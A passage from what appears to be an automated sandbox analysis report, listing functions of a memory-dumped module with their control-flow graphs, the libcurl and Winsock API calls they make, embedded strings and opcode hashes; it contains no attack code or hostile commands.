                                                                                                                                            control_flow_graph 610 6b7884a0-6b7884e5 611 6b7884f7-6b788507 call 6b788840 610->611 612 6b7884e7-6b7884f4 call 6b7a3fd0 610->612 617 6b788509-6b788522 call 6b7a06b0 611->617 618 6b788525-6b78852c 611->618 612->611 617->618 620 6b788539-6b78853d 618->620 621 6b78852e-6b788536 call 6b7a4010 618->621 622 6b788661 620->622 623 6b788543-6b788551 620->623 621->620 628 6b788664-6b78867c call 6b7bdb71 622->628 626 6b788589-6b788598 inet_pton 623->626 627 6b788553-6b788580 call 6b797550 * 2 623->627 632 6b7885b9-6b7885c8 inet_pton 626->632 633 6b78859a-6b7885b0 call 6b776fb0 626->633 650 6b7886cf-6b7886e2 call 6b7bdb71 627->650 660 6b788586 627->660 637 6b7885e9-6b7885f4 call 6b788a60 632->637 638 6b7885ca-6b7885e0 call 6b776fb0 632->638 645 6b78867d-6b788684 633->645 646 6b7885b6 633->646 649 6b7885fa-6b7885fe 637->649 637->650 638->645 647 6b7885e6 638->647 651 6b788693-6b7886ad call 6b787ae0 645->651 652 6b788686-6b788690 call 6b7a3fd0 645->652 646->632 647->637 655 6b788619-6b788622 call 6b7878a0 649->655 656 6b788600-6b788607 649->656 665 6b7886ba-6b7886be 651->665 666 6b7886af-6b7886b7 call 6b7a4010 651->666 652->651 668 6b788627-6b78862e 655->668 656->655 661 6b788609-6b788617 call 6b79db40 656->661 660->626 661->668 670 6b7886cb-6b7886cd 665->670 671 6b7886c0-6b7886c9 call 6b776de0 665->671 666->665 668->645 673 6b788630-6b788633 668->673 670->628 671->622 673->622 676 6b788635-6b788641 673->676 677 6b78864a call 6b771380 676->677 678 6b788643-6b788648 call 6b79dcd0 676->678 683 6b78864f-6b788654 677->683 678->683 683->650 684 6b788656-6b78865e 683->684 684->622
                                                                                                                                            APIs
                                                                                                                                            • inet_pton.WS2_32(00000002,00000000,?), ref: 6B788590
                                                                                                                                            • inet_pton.WS2_32(00000017,00000000,?), ref: 6B7885C0
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: inet_pton
                                                                                                                                            • String ID: )<wk$)<wk$)<wk$Hostname %s was found in DNS cache
                                                                                                                                            • API String ID: 1350483568-3188785951
                                                                                                                                            • Opcode ID: 5802dc0a60e4bfb12c8f3629bb4cdff6f000fbe448da169ad9b558ac7705f3bf
                                                                                                                                            • Instruction ID: fe4496fbc3cf08aae4e2c7c336a186e509df3ede9958d6d6a90c7e65c6e043ac
                                                                                                                                            • Opcode Fuzzy Hash: 5802dc0a60e4bfb12c8f3629bb4cdff6f000fbe448da169ad9b558ac7705f3bf
                                                                                                                                            • Instruction Fuzzy Hash: BD61C571E00209ABDB119FB4DE46BEFBBB8AF05358F0001B5F91576281E7395A15CBE1
                                                                                                                                            Function 6B779E30 Relevance: 7.6, APIs: 5, Instructions: 65COMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 8e8067a78db3303a3bad7c691af0d7dd1dfa7efe4d97dbf7c1a2c5341c2d2b3a
                                                                                                                                            • Instruction ID: dca50cfa7984e519151a68481f87a307e994cd33ddfb9e3b5e57d1465f5b1de2
                                                                                                                                            • Opcode Fuzzy Hash: 8e8067a78db3303a3bad7c691af0d7dd1dfa7efe4d97dbf7c1a2c5341c2d2b3a
                                                                                                                                            • Instruction Fuzzy Hash: 6211CA72E021147BDF31A9759DC5BAF7BAC9F51A90F0401B5FD0C9B242E7688D4182E1
                                                                                                                                            Function 6B781650 Relevance: 6.2, APIs: 4, Instructions: 151COMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • curl_multi_remove_handle.LIBCURL(?), ref: 6B781681
                                                                                                                                            • curl_multi_cleanup.LIBCURL(?), ref: 6B781691
                                                                                                                                            • curl_slist_free_all.LIBCURL(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6B781904
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: curl_multi_cleanupcurl_multi_remove_handlecurl_slist_free_all
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3107128920-0
                                                                                                                                            • Opcode ID: e0f8d218cac8f83cc7a058a74f126eed3233b77534ecc88d2dc9665e4f2a5fef
                                                                                                                                            • Instruction ID: 1879423e99096fd621c8fd06a2e49f7cbcc7d2efd92f91b948f33dfe2bdeb9af
                                                                                                                                            • Opcode Fuzzy Hash: e0f8d218cac8f83cc7a058a74f126eed3233b77534ecc88d2dc9665e4f2a5fef
                                                                                                                                            • Instruction Fuzzy Hash: EA6112B8400B50EBDB215FB0E90D7CA7BE9BF05309F004869F5AE52650D7B9B054DF65
                                                                                                                                            Function 6B7CF692 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000000,6B7C1F4E,6B7C8951,6B7C8465,?,00000000,?,?,?,?,?,?,?,CMyk), ref: 6B7CF697
                                                                                                                                            • _free.LIBCMT ref: 6B7CF6F4
                                                                                                                                            • _free.LIBCMT ref: 6B7CF72A
                                                                                                                                            • SetLastError.KERNEL32(00000000,00000015,000000FF,?,?,?,?,?,?,?,CMyk,6B7C8987,00000000,?,?,0000000A), ref: 6B7CF735
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast_free
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2283115069-0
                                                                                                                                            • Opcode ID: 6585cc774cb8936d96043a32cde4e65ba2921df9e5f65ccc89414cac07a23f4a
                                                                                                                                            • Instruction ID: 6612206b45e99415203eee1d28cea44b8ce9529af3ee2b15fcc27340bbb964c8
                                                                                                                                            • Opcode Fuzzy Hash: 6585cc774cb8936d96043a32cde4e65ba2921df9e5f65ccc89414cac07a23f4a
                                                                                                                                            • Instruction Fuzzy Hash: AA11A9322045016FDA055A789F9AE1F276D9BC67B8B20027DF5359F1D0EF2DCC0D4626
                                                                                                                                            Function 6B7983D0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 251COMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 851 6b7983d0-6b7983f9 852 6b7983ff-6b79843c call 6b7714e0 851->852 853 6b798551-6b798563 call 6b7bdb71 851->853 860 6b798448 852->860 861 6b79843e-6b798441 852->861 863 6b79844c-6b798457 860->863 861->860 862 6b798443-6b798446 861->862 862->860 862->863 864 6b798459-6b798465 863->864 865 6b798468-6b79846b 863->865 864->865 866 6b79846d-6b798478 call 6b79c6d0 865->866 867 6b798487-6b79849d 865->867 866->867 882 6b79847a-6b798484 866->882 868 6b79849f-6b7984ab 867->868 869 6b7984f1-6b7984f8 867->869 872 6b7984bd-6b7984ea call 6b792020 call 6b7969d0 868->872 873 6b7984ad-6b7984ba call 6b7aeee0 868->873 874 6b7984fa-6b798504 call 6b7a3fd0 869->874 875 6b798507-6b79850c 869->875 872->869 873->872 874->875 880 6b79850e-6b798520 call 6b792020 875->880 881 6b798523-6b798531 875->881 880->881 884 6b798533-6b798544 881->884 885 6b798564-6b798579 881->885 882->867 884->853 890 6b798546-6b79854e call 6b7a4010 884->890 892 6b79857b-6b798585 call 6b788780 885->892 893 6b79858f-6b7985b5 call 6b787df0 885->893 890->853 892->893 902 6b7985de-6b7985ef 893->902 903 6b7985b7-6b7985bf 893->903 905 6b798619-6b798620 902->905 906 6b7985f1-6b7985f8 902->906 904 6b7985c0-6b7985d3 call 6b7b4db0 903->904 919 6b7985d5-6b7985db 904->919 909 6b7986e9-6b798704 call 6b772a10 call 6b7723e0 905->909 910 6b798626-6b79862a 905->910 906->905 908 6b7985fa-6b798601 906->908 908->905 913 6b798603-6b79860a 908->913 930 6b798711-6b798720 call 6b781bd0 909->930 931 6b798706-6b79870e call 6b7a4010 909->931 914 6b79862c-6b798639 910->914 915 6b79863f-6b798646 910->915 913->905 920 6b79860c-6b798613 913->920 914->909 914->915 916 6b798648-6b79864e 915->916 917 6b798650-6b798657 915->917 921 6b798678-6b79869f curl_msnprintf 916->921 922 6b798659-6b79865f 917->922 923 6b798661-6b798668 917->923 919->902 920->905 920->909 928 6b7986ac-6b7986b8 call 6b7724b0 921->928 929 6b7986a1-6b7986a9 call 6b7a4010 921->929 922->921 925 6b79866a-6b798670 923->925 926 6b798672 923->926 925->921 926->921 940 6b7986ba-6b7986db call 6b7a06b0 928->940 941 6b7986dd-6b7986e7 928->941 929->928 942 6b798727 930->942 943 6b798722-6b798724 930->943 931->930 940->942 941->942 946 6b798733-6b798758 call 6b781ce0 call 6b7bdb71 942->946 943->942
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 6B7714E0: EnterCriticalSection.KERNEL32(?,?,00000000,?,?,?,6B781C62,?,00000000), ref: 6B7715E0
                                                                                                                                              • Part of subcall function 6B7714E0: LeaveCriticalSection.KERNEL32(?,?,?,6B781C62,?,00000000), ref: 6B7715F3
                                                                                                                                              • Part of subcall function 6B7714E0: closesocket.WS2_32(000006FC), ref: 6B771642
                                                                                                                                            • curl_msnprintf.LIBCURL(?,00000100,Connection #%ld to host %s left intact,?,?), ref: 6B798690
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CriticalSection$EnterLeaveclosesocketcurl_msnprintf
                                                                                                                                            • String ID: %s$Connection #%ld to host %s left intact
                                                                                                                                            • API String ID: 283241466-118628944
                                                                                                                                            • Opcode ID: 4a2212ceebf2e5056967016076d7a0a2336d7a612c377b058dfd23baad79d263
                                                                                                                                            • Instruction ID: d244eedb57bc4bc5acba7193838a3d30d5bf8bd63314cb0003e1c0ace89fd6b0
                                                                                                                                            • Opcode Fuzzy Hash: 4a2212ceebf2e5056967016076d7a0a2336d7a612c377b058dfd23baad79d263
                                                                                                                                            • Instruction Fuzzy Hash: D6A1F470600B00ABD721EF34FE49BDAB7E4BF05349F0005B9F86A56252E779A654CFA1
                                                                                                                                            Function 6B772A60 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 200COMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 951 6b772a60-6b772a9b 952 6b772aa0-6b772aa3 951->952 953 6b772a9d 951->953 954 6b772aa5-6b772aa8 952->954 955 6b772ab8 952->955 953->952 956 6b772b60-6b772b62 954->956 957 6b772aae-6b772ab1 954->957 958 6b772aba-6b772abd 955->958 956->958 959 6b772ab3-6b772ab5 957->959 960 6b772abf-6b772afd call 6b7ae5d0 call 6b7ae680 957->960 958->960 959->955 965 6b772c83-6b772c9e call 6b7a05d0 960->965 966 6b772b03-6b772b05 960->966 966->965 967 6b772b0b 966->967 969 6b772b15-6b772b53 call 6b7883d0 967->969 970 6b772b0d-6b772b0f 967->970 974 6b772b67-6b772b7c call 6b7bdb90 969->974 975 6b772b55-6b772b5e 969->975 970->965 970->969 976 6b772b7f-6b772b98 974->976 975->976 979 6b772b9a-6b772ba5 call 6b7bdb90 976->979 980 6b772ba8-6b772bb6 976->980 979->980 981 6b772bbd 980->981 982 6b772bb8-6b772bbb 980->982 984 6b772bbf-6b772be4 981->984 982->984 986 6b772be6-6b772be9 984->986 987 6b772bf2-6b772bfa 984->987 986->987 988 6b772beb-6b772bf0 986->988 989 6b772c00-6b772c02 987->989 988->986 988->987 990 6b772c04-6b772c08 989->990 991 6b772c62-6b772c82 call 6b7969d0 989->991 993 6b772c4c-6b772c53 990->993 994 6b772c0a 990->994 993->989 995 6b772c55-6b772c57 993->995 997 6b772c10-6b772c13 call 6b7740c0 994->997 995->991 998 6b772c59-6b772c61 995->998 1000 6b772c18-6b772c1f 997->1000 1001 6b772c21-6b772c25 1000->1001 1002 6b772c49 1000->1002 1003 6b772c27-6b772c2c 1001->1003 1004 6b772c40-6b772c47 1001->1004 1002->993 1003->1004 1005 6b772c2e-6b772c31 1003->1005 1004->997 1004->1002 1006 6b772c34-6b772c37 1005->1006 1006->1004 1007 6b772c39-6b772c3e 1006->1007 1007->1004 1007->1006
                                                                                                                                            APIs
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B772B71
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B772BA0
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                            • String ID: Connection time-out
                                                                                                                                            • API String ID: 885266447-165637984
                                                                                                                                            • Opcode ID: 9d44b17786fe7d29b2199e74d56c2348a8931206eb8aac90d58eaf6bb541b53b
                                                                                                                                            • Instruction ID: b8954cf79ae23731b6f4b2610fc40f46c7851c2549d85785902dee3068eb403e
                                                                                                                                            • Opcode Fuzzy Hash: 9d44b17786fe7d29b2199e74d56c2348a8931206eb8aac90d58eaf6bb541b53b
                                                                                                                                            • Instruction Fuzzy Hash: 9A71A071E006059FDB24DF68CA49BAEB7B1FF55314F1482BDE828AB351E7369941CB80
                                                                                                                                            Function 6B7A07E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24networkCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • recv.WS2_32(00000008,?,?,00000000), ref: 6B7A07EE
                                                                                                                                            • WSAGetLastError.WS2_32(?,6B7A737C,?,?,00000008,?), ref: 6B7A07FB
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLastrecv
                                                                                                                                            • String ID: |szk
                                                                                                                                            • API String ID: 2514157807-1504329629
                                                                                                                                            • Opcode ID: a485141d7b87a8a6eb3f20349589478eb4c3ff36c6a4beaf902c508bbd2c793c
                                                                                                                                            • Instruction ID: f0d811f8dc9e7a548f64e82e176b3fc6ce267b3500f263aa291a710ee42fd01c
                                                                                                                                            • Opcode Fuzzy Hash: a485141d7b87a8a6eb3f20349589478eb4c3ff36c6a4beaf902c508bbd2c793c
                                                                                                                                            • Instruction Fuzzy Hash: D2E09A3520820CAFDF058F70DC1475E3BA6EF85320F404578F9298A3D0C732E9219B54
                                                                                                                                            Function 6B776E10 Relevance: 4.6, APIs: 3, Instructions: 146networkCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • getaddrinfo.WS2_32(?,?,?,6B7DB330), ref: 6B776E2E
                                                                                                                                            • freeaddrinfo.WS2_32(6B7DB330,?,?,6B7DB330,?), ref: 6B776F4C
                                                                                                                                            • WSASetLastError.WS2_32(00002AF9,?,?,6B7DB330,?), ref: 6B776F99
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLastfreeaddrinfogetaddrinfo
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1817844550-0
                                                                                                                                            • Opcode ID: 974c505a9e5a5154ac15a351c0e7d6687270321df6e61162a34d16339c507458
                                                                                                                                            • Instruction ID: abb34c653658ebaf5c0096b5c9fb49f8a3f84cb1df6e97b7b55e3f6d2256d55a
                                                                                                                                            • Opcode Fuzzy Hash: 974c505a9e5a5154ac15a351c0e7d6687270321df6e61162a34d16339c507458
                                                                                                                                            • Instruction Fuzzy Hash: 1C517AB2A007069FDF20DF99D680A6EBBF5BF48700B0485B9F859A7314D734EA148BD0
                                                                                                                                            Function 6B7C8360 Relevance: 4.6, APIs: 3, Instructions: 51threadCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • CreateThread.KERNEL32(6B7716D0,6B771218,6B7C8204,00000000,00000000,6B7716D0), ref: 6B7C83A9
                                                                                                                                            • GetLastError.KERNEL32(?,?,?,6B779136,00000000,00000000,6B7716D0,6B771218,00000000,00000000), ref: 6B7C83B5
                                                                                                                                            • __dosmaperr.LIBCMT ref: 6B7C83BC
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateErrorLastThread__dosmaperr
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2744730728-0
                                                                                                                                            • Opcode ID: f9b9102fcd1842bd1ad682e670e32da330467a1f67068537da52d7fd25070dbd
                                                                                                                                            • Instruction ID: 67fd31bf59d3157aeda371ef9900a11b403636482729616da295afc38b22e6a7
                                                                                                                                            • Opcode Fuzzy Hash: f9b9102fcd1842bd1ad682e670e32da330467a1f67068537da52d7fd25070dbd
                                                                                                                                            • Instruction Fuzzy Hash: C701B132510219EFDF058FB1CE09AAF7BA4EF00368F00406DF81196140DB78DA10DBA2
                                                                                                                                            Function 6B774740 Relevance: 4.5, APIs: 3, Instructions: 36networkCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • SleepEx.KERNEL32(00000000,00000000), ref: 6B774758
                                                                                                                                            • getsockopt.WS2_32(00000004,0000FFFF,00001007,00000000,00000004), ref: 6B774773
                                                                                                                                            • WSAGetLastError.WS2_32 ref: 6B77477D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLastSleepgetsockopt
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3033474312-0
                                                                                                                                            • Opcode ID: fc6fb1cd922cab2d425175ec7a78440e09a7f01e1b65bf568f411b50a2841b40
                                                                                                                                            • Instruction ID: 8acecab469fd37de33674783effe378048f898718cde4410c03b804d09b40719
                                                                                                                                            • Opcode Fuzzy Hash: fc6fb1cd922cab2d425175ec7a78440e09a7f01e1b65bf568f411b50a2841b40
                                                                                                                                            • Instruction Fuzzy Hash: EBF06275640109EBEF20AEA5CD457AE7BBCAB43741F2040B4F9149A280D775A605AB90
                                                                                                                                            Function 6B771050 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 152COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • InitializeCriticalSectionEx.KERNEL32(00000000,00000000,00000001,?,?,00000000,00000048), ref: 6B77115D
                                                                                                                                            Strings
                                                                                                                                            • getaddrinfo() thread failed to start, xrefs: 6B7711AA
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CriticalInitializeSection
                                                                                                                                            • String ID: getaddrinfo() thread failed to start
                                                                                                                                            • API String ID: 32694325-737161664
                                                                                                                                            • Opcode ID: e26e4d85ed6f4e6f1ad92fb3eae95a188af1c9247c30340d6fa3f0a894c66c6d
                                                                                                                                            • Instruction ID: 27c8d445ba56a08d37315c2a603ac858c162836878f31e101736daa13a1e4b39
                                                                                                                                            • Opcode Fuzzy Hash: e26e4d85ed6f4e6f1ad92fb3eae95a188af1c9247c30340d6fa3f0a894c66c6d
                                                                                                                                            • Instruction Fuzzy Hash: 7F51C0B1900216EBDF109F64DA457997BB4FF05314F0042B5FD18AF681EB79E5A0CBA1
                                                                                                                                            Function 6B79A660 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • ioctlsocket.WS2_32(00000000,8004667E,TEwk), ref: 6B79A67A
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ioctlsocket
                                                                                                                                            • String ID: TEwk
                                                                                                                                            • API String ID: 3577187118-2841927459
                                                                                                                                            • Opcode ID: 27e12a93ea5cb658c8371d952caa5afabbdf5c473fa9e49cc9e1949ab0ed2089
                                                                                                                                            • Instruction ID: 4d35720da925663ed4a1b446463f0300ac80f42b46a3754e32149b6fb2c4cc69
                                                                                                                                            • Opcode Fuzzy Hash: 27e12a93ea5cb658c8371d952caa5afabbdf5c473fa9e49cc9e1949ab0ed2089
                                                                                                                                            • Instruction Fuzzy Hash: 42D0E97240110CEFCB015E71D8058D97BADEA44265B01C43AB91995111EB35E665DF55
                                                                                                                                            Function 6B797990 Relevance: 1.6, APIs: 1, Instructions: 79networkCOMMON
